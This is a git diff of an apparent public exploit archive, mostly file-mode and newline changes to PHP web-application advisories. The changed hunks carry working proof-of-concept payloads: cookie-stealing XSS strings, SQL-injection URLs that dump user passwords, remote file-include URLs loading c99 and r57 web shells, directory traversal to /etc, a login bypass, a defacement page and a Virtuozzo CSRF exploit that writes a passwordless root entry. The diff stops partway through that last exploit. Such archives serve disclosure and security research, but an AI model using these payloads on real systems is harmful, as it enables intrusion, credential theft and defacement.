-http://www.example.com/photo/index.php?directory="><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/photo/index.php?directory="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/31410.txt b/platforms/php/webapps/31410.txt old mode 100755 new mode 100644 index 5498917cb..44a7aa912 --- a/platforms/php/webapps/31410.txt +++ b/platforms/php/webapps/31410.txt @@ -4,4 +4,4 @@ The 'guide' component for Joomla! and Mambo is prone to an SQL-injection vulnera Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31414.txt b/platforms/php/webapps/31414.txt old mode 100755 new mode 100644 index 9ba64591c..3a3533825 --- a/platforms/php/webapps/31414.txt +++ b/platforms/php/webapps/31414.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects phpstats 0.1_alpha. -http://www.example.com/phpstats/phpstats.php?baseDir=<script>alert(1)</script>&mode=run \ No newline at end of file +http://www.example.com/phpstats/phpstats.php?baseDir=<script>alert(1)</script>&mode=run \ No newline at end of file diff --git a/platforms/php/webapps/31415.txt b/platforms/php/webapps/31415.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31416.txt b/platforms/php/webapps/31416.txt old mode 100755 new mode 100644 index c8b8bcef6..8847d93c3 --- a/platforms/php/webapps/31416.txt +++ b/platforms/php/webapps/31416.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow webSPELL 4.01.02 is vulnerable; other versions may also be affected. -http://www.example.com/path/index.php?site=forum&board=">[XSS] \ No newline at end of file +http://www.example.com/path/index.php?site=forum&board=">[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31418.txt b/platforms/php/webapps/31418.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31419.txt b/platforms/php/webapps/31419.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31420.txt b/platforms/php/webapps/31420.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31421.txt b/platforms/php/webapps/31421.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31424.txt b/platforms/php/webapps/31424.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31426.txt b/platforms/php/webapps/31426.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31427.txt b/platforms/php/webapps/31427.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3143.php b/platforms/php/webapps/3143.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31431.txt b/platforms/php/webapps/31431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31436.txt b/platforms/php/webapps/31436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31439.txt b/platforms/php/webapps/31439.txt old mode 100755 new mode 100644 index 6731042cf..b70afba45 --- a/platforms/php/webapps/31439.txt +++ b/platforms/php/webapps/31439.txt @@ -5,4 +5,4 @@ cPanel is prone to an information-disclosure vulnerability. An attacker can exploit this issue to determine programs that are running on the affected server and to view folders on other sites that are protected by a firewall. Information obtained may lead to further attacks. http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/home/user/.htpasswds -http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/var \ No newline at end of file +http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/var \ No newline at end of file diff --git a/platforms/php/webapps/31441.txt b/platforms/php/webapps/31441.txt old mode 100755 new mode 100644 index 728ac0cec..4f4226c0c --- a/platforms/php/webapps/31441.txt +++ b/platforms/php/webapps/31441.txt @@ -13,4 +13,4 @@ http://www.example.com/path/post.php?id='+union+select+2,3,user,password,6,7,8,9 http://www.example.com/path/vote.php?id='+union+select+password,3,4,5,6,7,8,9,10,11,12+from+myblog_users+/* http://www.example.com/path/vote.php?mid='+union+select+password,3,4,5,6,7,8,9,10+from+myblog_users+/* http://www.example.com/path/games.php?id=[shell]%00 -http://www.example.com/path/games.php?scoreid=[shell]%00 \ No newline at end of file +http://www.example.com/path/games.php?scoreid=[shell]%00 \ No newline at end of file diff --git a/platforms/php/webapps/31443.txt b/platforms/php/webapps/31443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31447.txt b/platforms/php/webapps/31447.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31448.txt b/platforms/php/webapps/31448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31449.txt b/platforms/php/webapps/31449.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3145.txt b/platforms/php/webapps/3145.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31450.txt b/platforms/php/webapps/31450.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31451.txt b/platforms/php/webapps/31451.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31452.txt b/platforms/php/webapps/31452.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31453.txt b/platforms/php/webapps/31453.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31454.txt b/platforms/php/webapps/31454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31455.txt b/platforms/php/webapps/31455.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31456.txt b/platforms/php/webapps/31456.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31457.txt b/platforms/php/webapps/31457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31458.txt b/platforms/php/webapps/31458.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31459.txt b/platforms/php/webapps/31459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31467.txt b/platforms/php/webapps/31467.txt old mode 100755 new mode 100644 index 255dd385f..89db1ff57 --- a/platforms/php/webapps/31467.txt +++ b/platforms/php/webapps/31467.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow phpMyChat 0.14.5 is vulnerable; other versions may also be affected. -http://www.example.com/chat/setup.php3?Lang="<xss> \ No newline at end of file +http://www.example.com/chat/setup.php3?Lang="<xss> \ No newline at end of file diff --git a/platforms/php/webapps/31468.txt b/platforms/php/webapps/31468.txt old mode 100755 new mode 100644 index c3d688ce9..da5a1d8b9 --- a/platforms/php/webapps/31468.txt +++ b/platforms/php/webapps/31468.txt @@ -11,4 +11,4 @@ http://www.example.com/mywebdoccalendaradd.php3?x http://www.example.com/mywebdoclisting.php3?x http://www.example.com/mywebdocchangepassword.php3?x http://www.example.com/mywebdocadduser.php3?x -http://www.example.com/mywebdocuserlisting.php3?x \ No newline at end of file +http://www.example.com/mywebdocuserlisting.php3?x \ No newline at end of file diff --git a/platforms/php/webapps/31469.txt b/platforms/php/webapps/31469.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3147.txt b/platforms/php/webapps/3147.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31470.txt b/platforms/php/webapps/31470.txt old mode 100755 new mode 100644 index 1c7febfaa..97a7770ae --- a/platforms/php/webapps/31470.txt +++ b/platforms/php/webapps/31470.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and ooComments 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/classes/class_comments.php?PathToComment=ZoRLu.txt? \ No newline at end of file +http://www.example.com/classes/class_comments.php?PathToComment=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31471.txt b/platforms/php/webapps/31471.txt old mode 100755 new mode 100644 index faef27cc8..62501ed9a --- a/platforms/php/webapps/31471.txt +++ b/platforms/php/webapps/31471.txt @@ -4,4 +4,4 @@ TinyPortal is prone to a cross-site scripting vulnerability because it fails to An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/index.php?PHPSESSID="><xss> \ No newline at end of file +http://www.example.com/index.php?PHPSESSID="><xss> \ No newline at end of file diff --git a/platforms/php/webapps/31472.txt b/platforms/php/webapps/31472.txt old mode 100755 new mode 100644 index 82a259268..0acdf4604 --- a/platforms/php/webapps/31472.txt +++ b/platforms/php/webapps/31472.txt @@ -4,4 +4,4 @@ cPanel is prone to a cross-site scripting vulnerability because the application An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/frontend/x/manpage.html?<xss> \ No newline at end of file +http://www.example.com/frontend/x/manpage.html?<xss> \ No newline at end of file diff --git a/platforms/php/webapps/31476.txt b/platforms/php/webapps/31476.txt old mode 100755 new mode 100644 index 4dd86d411..8f5dcff41 --- a/platforms/php/webapps/31476.txt +++ b/platforms/php/webapps/31476.txt @@ -5,4 +5,4 @@ Efestech E-Kontor is prone to an SQL-injection vulnerability because it fails to Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1 -http://www.example.com/?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1 \ No newline at end of file +http://www.example.com/?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1 \ No newline at end of file diff --git a/platforms/php/webapps/31480.txt b/platforms/php/webapps/31480.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31481.txt b/platforms/php/webapps/31481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31482.txt b/platforms/php/webapps/31482.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31483.txt b/platforms/php/webapps/31483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31484.txt b/platforms/php/webapps/31484.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31485.txt b/platforms/php/webapps/31485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31486.txt b/platforms/php/webapps/31486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31487.txt b/platforms/php/webapps/31487.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31488.txt b/platforms/php/webapps/31488.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31489.txt b/platforms/php/webapps/31489.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31490.txt b/platforms/php/webapps/31490.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31491.txt b/platforms/php/webapps/31491.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31492.txt b/platforms/php/webapps/31492.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31493.txt b/platforms/php/webapps/31493.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31494.txt b/platforms/php/webapps/31494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31495.txt b/platforms/php/webapps/31495.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31496.txt b/platforms/php/webapps/31496.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31497.txt b/platforms/php/webapps/31497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31498.txt b/platforms/php/webapps/31498.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31499.txt b/platforms/php/webapps/31499.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3150.txt b/platforms/php/webapps/3150.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31500.txt b/platforms/php/webapps/31500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31501.txt b/platforms/php/webapps/31501.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31502.txt b/platforms/php/webapps/31502.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31503.txt b/platforms/php/webapps/31503.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31504.txt b/platforms/php/webapps/31504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31505.txt b/platforms/php/webapps/31505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31506.txt b/platforms/php/webapps/31506.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31507.txt b/platforms/php/webapps/31507.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31508.txt b/platforms/php/webapps/31508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31509.txt b/platforms/php/webapps/31509.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31510.txt b/platforms/php/webapps/31510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31511.txt b/platforms/php/webapps/31511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31512.txt b/platforms/php/webapps/31512.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31513.txt b/platforms/php/webapps/31513.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31514.txt b/platforms/php/webapps/31514.txt old mode 100755 new mode 100644 index 11712b63d..26c092fa5 --- a/platforms/php/webapps/31514.txt +++ b/platforms/php/webapps/31514.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and Quick Classifieds 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/QuickSystems_path/style/default.scheme.inc?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file +http://www.example.com/QuickSystems_path/style/default.scheme.inc?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31515.txt b/platforms/php/webapps/31515.txt old mode 100755 new mode 100644 index 6827dede4..40e65d751 --- a/platforms/php/webapps/31515.txt +++ b/platforms/php/webapps/31515.txt @@ -57,4 +57,4 @@ - Credits: - Ahmed Aboul-Ela - Information Security Consultant @ Starware \ No newline at end of file + Ahmed Aboul-Ela - Information Security Consultant @ Starware \ No newline at end of file diff --git a/platforms/php/webapps/31516.txt b/platforms/php/webapps/31516.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31517.txt b/platforms/php/webapps/31517.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3152.txt b/platforms/php/webapps/3152.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31520.txt b/platforms/php/webapps/31520.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31521.txt b/platforms/php/webapps/31521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31525.txt b/platforms/php/webapps/31525.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31528.txt b/platforms/php/webapps/31528.txt old mode 100755 new mode 100644 index 7cf987511..c1dc7d89b --- a/platforms/php/webapps/31528.txt +++ b/platforms/php/webapps/31528.txt @@ -4,4 +4,4 @@ Le Forum is prone to a remote file-include vulnerability because it fails to pro An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/forum_path/fora-acc.php3?Fichier_Acceuil=ZoRLu.txt? \ No newline at end of file +http://www.example.com/forum_path/fora-acc.php3?Fichier_Acceuil=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31529.txt b/platforms/php/webapps/31529.txt old mode 100755 new mode 100644 index a75e96fd0..5b4d85664 --- a/platforms/php/webapps/31529.txt +++ b/platforms/php/webapps/31529.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The issue affects Cinema 1.0; other versions may also be vulnerable. http://www.example.com/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/* -http://www.example.com/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(username,0x3a,password)/**/from/**/jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(username,0x3a,password)/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/3153.php b/platforms/php/webapps/3153.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31530.txt b/platforms/php/webapps/31530.txt old mode 100755 new mode 100644 index b989c9073..32f09c5ad --- a/platforms/php/webapps/31530.txt +++ b/platforms/php/webapps/31530.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The issue affects Download3000 1.0; other versions may also be vulnerable. -http://www.example.com/index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/* \ No newline at end of file +http://www.example.com/index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/* \ No newline at end of file diff --git a/platforms/php/webapps/31535.txt b/platforms/php/webapps/31535.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31539.txt b/platforms/php/webapps/31539.txt old mode 100755 new mode 100644 index f9cd3c4e4..624cf5911 --- a/platforms/php/webapps/31539.txt +++ b/platforms/php/webapps/31539.txt @@ -9,4 +9,4 @@ phpAddressBook 2.0 is vulnerable; other versions may also be affected. The following proof of concept is available: login:admin ' or 1=1/* -password:[blank] \ No newline at end of file +password:[blank] \ No newline at end of file diff --git a/platforms/php/webapps/31541.html b/platforms/php/webapps/31541.html old mode 100755 new mode 100644 index f0fae1f3b..ce3ad1d88 --- a/platforms/php/webapps/31541.html +++ b/platforms/php/webapps/31541.html @@ -7,4 +7,4 @@ Attacker-supplied script code could exploit vulnerabilities in the user's browse This issue affects IP.Board 2.3.1; other versions may also be affected. -<html> <head> <title>HACKED BY YOUR-NAME</title> </head> <body> <div id="iFrame1" style="position:absolute; left:0px; top:0px; z- index:0"> <iframe name="iFrame1" width=1024 height=3186 src="http://www.example.com/ YOUR-PATH/YOUR.html" scrolling="no" frameborder="0"></iframe> </div> </body> </html> \ No newline at end of file +<html> <head> <title>HACKED BY YOUR-NAME</title> </head> <body> <div id="iFrame1" style="position:absolute; left:0px; top:0px; z- index:0"> <iframe name="iFrame1" width=1024 height=3186 src="http://www.example.com/ YOUR-PATH/YOUR.html" scrolling="no" frameborder="0"></iframe> </div> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/31543.txt b/platforms/php/webapps/31543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31544.txt b/platforms/php/webapps/31544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31545.txt b/platforms/php/webapps/31545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31549.txt b/platforms/php/webapps/31549.txt old mode 100755 new mode 100644 index 542113728..bacf71cdf --- a/platforms/php/webapps/31549.txt +++ b/platforms/php/webapps/31549.txt @@ -11,4 +11,4 @@ http://www.example.com/forum.php?main_dir=http://www.example2.com/c99.txt? http://www.example.com/headlines.php?website=http://www.example2.com/erne.txt? http://www.example.com/headlines.php?main_dir=http://www.example2.com/r57.txt? http://www.example.com/main.php?website=http://www.example2.com/c99.txt? -http://www.example.com/main.php?main_dir=http://www.example2.com/erne.txt? \ No newline at end of file +http://www.example.com/main.php?main_dir=http://www.example2.com/erne.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31555.txt b/platforms/php/webapps/31555.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31564.txt b/platforms/php/webapps/31564.txt old mode 100755 new mode 100644 index c58348bdc..01d9afaa2 --- a/platforms/php/webapps/31564.txt +++ b/platforms/php/webapps/31564.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Jax LinkLists 1.00 is vulnerable; other versions may also be affected. -http://www.example.com/scripting/php/linklists/linklists/jax_linklists.php?do=list&list_id=0&language=german&cat="><script>alert()</script> \ No newline at end of file +http://www.example.com/scripting/php/linklists/linklists/jax_linklists.php?do=list&list_id=0&language=german&cat="><script>alert()</script> \ No newline at end of file diff --git a/platforms/php/webapps/31565.txt b/platforms/php/webapps/31565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31566.txt b/platforms/php/webapps/31566.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31567.txt b/platforms/php/webapps/31567.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31568.txt b/platforms/php/webapps/31568.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31570.txt b/platforms/php/webapps/31570.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31571.txt b/platforms/php/webapps/31571.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31580.txt b/platforms/php/webapps/31580.txt old mode 100755 new mode 100644 index e53c6c0c6..506637fcb --- a/platforms/php/webapps/31580.txt +++ b/platforms/php/webapps/31580.txt @@ -4,4 +4,4 @@ Jax Guestbook is prone to a cross-site scripting vulnerability because it fails An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/scripting/php/guestbook/guestbook/jax_guestbook.php?language="><script>alert()</script> \ No newline at end of file +http://www.example.com/scripting/php/guestbook/guestbook/jax_guestbook.php?language="><script>alert()</script> \ No newline at end of file diff --git a/platforms/php/webapps/31581.txt b/platforms/php/webapps/31581.txt old mode 100755 new mode 100644 index abed648bb..b820f70fd --- a/platforms/php/webapps/31581.txt +++ b/platforms/php/webapps/31581.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute malicious PHP code in the context PhpGKit 0.9 is vulnerable; other versions may also be affected. -http://www.example.com/phpg_kit_path/connexion.php?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file +http://www.example.com/phpg_kit_path/connexion.php?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31584.txt b/platforms/php/webapps/31584.txt old mode 100755 new mode 100644 index 40bec2758..2679da4f0 --- a/platforms/php/webapps/31584.txt +++ b/platforms/php/webapps/31584.txt @@ -4,4 +4,4 @@ Terracotta is prone to a local file-include vulnerability because it fails to pr An attacker can exploit this vulnerability using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks. -http://www.example.com/index.php?CurrentDirectory=FOLDER_420c142a1bebd1.90885049/../../../../../../../../../etc/&StartAt=12 \ No newline at end of file +http://www.example.com/index.php?CurrentDirectory=FOLDER_420c142a1bebd1.90885049/../../../../../../../../../etc/&StartAt=12 \ No newline at end of file diff --git a/platforms/php/webapps/31587.txt b/platforms/php/webapps/31587.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31588.txt b/platforms/php/webapps/31588.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31589.txt b/platforms/php/webapps/31589.txt old mode 100755 new mode 100644 index 01a53dcd5..b964ffca7 --- a/platforms/php/webapps/31589.txt +++ b/platforms/php/webapps/31589.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and EasySite 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/Easysite-2.0_path/configuration/skin_chooser.php?EASYSITE_BASE=ZoRLu.txt? \ No newline at end of file +http://www.example.com/Easysite-2.0_path/configuration/skin_chooser.php?EASYSITE_BASE=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31590.txt b/platforms/php/webapps/31590.txt old mode 100755 new mode 100644 index 8df287944..85c4223dd --- a/platforms/php/webapps/31590.txt +++ b/platforms/php/webapps/31590.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br DivXDB 2002 0.94b is vulnerable; other versions may also be affected. -http://www.example.com/index.php?choice="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?choice=14&_page_="><script>alert("CANAKKALE-GECiLMEZ")</script>&year_inf=1998&year_sup=2008 http://www.example.com/index.php?_page_="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?_page_=main.html&zone_admin="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?_page_=main.html&general_search=1&object="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?_page_=main.html&general_search="><script>alert("CANAKKALE-GECiLMEZ")</script>&object= http://www.example.com/index.php?_page_=main.html&import="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?_page_=main.html&choice="><script>alert("CANAKKALE-GECiLMEZ")</script> \ No newline at end of file +http://www.example.com/index.php?choice="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?choice=14&_page_="><script>alert("CANAKKALE-GECiLMEZ")</script>&year_inf=1998&year_sup=2008 http://www.example.com/index.php?_page_="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?_page_=main.html&zone_admin="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?_page_=main.html&general_search=1&object="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?_page_=main.html&general_search="><script>alert("CANAKKALE-GECiLMEZ")</script>&object= http://www.example.com/index.php?_page_=main.html&import="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?_page_=main.html&choice="><script>alert("CANAKKALE-GECiLMEZ")</script> \ No newline at end of file diff --git a/platforms/php/webapps/31595.txt b/platforms/php/webapps/31595.txt old mode 100755 new mode 100644 index 87d6352e3..e29ce4153 --- a/platforms/php/webapps/31595.txt +++ b/platforms/php/webapps/31595.txt @@ -4,4 +4,4 @@ The Joomlearn LMS component for Joomla! and Mambo is prone to an SQL-injection v Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_lms&task=showTests&cat=-1 union select 1,concat(username,char(32),password),3,4,5,6,7 from jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_lms&task=showTests&cat=-1 union select 1,concat(username,char(32),password),3,4,5,6,7 from jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31596.txt b/platforms/php/webapps/31596.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31597.txt b/platforms/php/webapps/31597.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31598.txt b/platforms/php/webapps/31598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31599.txt b/platforms/php/webapps/31599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31600.txt b/platforms/php/webapps/31600.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31601.txt b/platforms/php/webapps/31601.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31602.txt b/platforms/php/webapps/31602.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31603.html b/platforms/php/webapps/31603.html old mode 100755 new mode 100644 index 282dc9780..5160bf6aa --- a/platforms/php/webapps/31603.html +++ b/platforms/php/webapps/31603.html @@ -6,4 +6,4 @@ Exploiting the issue will allow a remote attacker to use a victim's currently ac Virtuozzo Containers 3.0.0-25.4.swsoft and 4.0.0-365.6.swsoft are vulnerable; other versions are also affected. -<!-- poplix papuasia.org -- http://px.dynalias.org -- 04-02-2008 this file exploits a vulnerable installation of virtuozzo web panel by overwriting /etc/passwd.demo tested against Version 365.6.swsoft (build: 4.0.0-365.6.swsoft). It doesn't work with older version due to paths changes. perform the following steps to test it: 1. create a blank /etc/passwd.demo on target machine 2. in this file replace 127.0.0.1 with target vps address 3. open a web browser and log into virtuozzo web interface 4. open this file in a new browser window and click the "lets rock" button when the page is fully loaded 5. check /etc/passwd.demo in the target vps filesystemm --> <script language="JavaScript"> var ok=false; function letsgo(){ ok=true; document.getElementById('form0').submit(); } </script> <!-- this sets /etc as the current path--> <iframe style="width:1px;height:1px;visibility:hidden" name=ifr src="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/index?path=L2V0Yw==" ></iframe> <iframe id=ifr1 style="width:1px;height:1px;visibility:hidden" name=ifr1 onload="if(ok)document.getElementById('form1').submit();" ></iframe> <iframe id=ifr2 style="width:1px;height:1px;visibility:hidden" name=ifr2 > </iframe> <!-- delete /etc/passwd.demo --> <form id=form0 target=ifr1 method=post action="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/list-control" > <input type=hidden name="file-name" value="passwd.demo"> <input type=hidden name=delete value=1> </form> <!-- create /etc/passwd.demo --> <form id=form1 target=ifr2 enctype="multipart/form-data" name="defaultForm" method="POST" action="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/create-file"> <input xmlns:http="http://www.swsoft.com/xsl/cp/http" type="hidden" name="step" value="gen"> <input type=hidden name="file_name" value="passwd.demo"> <input type=hidden name="file_body" value="root::0:0::/root:/bin/bash"> <input type=hidden name="next" value="Create"> </form> <input type=button value="lets rock" onclick="letsgo()"> \ No newline at end of file +<!-- poplix papuasia.org -- http://px.dynalias.org -- 04-02-2008 this file exploits a vulnerable installation of virtuozzo web panel by overwriting /etc/passwd.demo tested against Version 365.6.swsoft (build: 4.0.0-365.6.swsoft). It doesn't work with older version due to paths changes. perform the following steps to test it: 1. create a blank /etc/passwd.demo on target machine 2. in this file replace 127.0.0.1 with target vps address 3. open a web browser and log into virtuozzo web interface 4. open this file in a new browser window and click the "lets rock" button when the 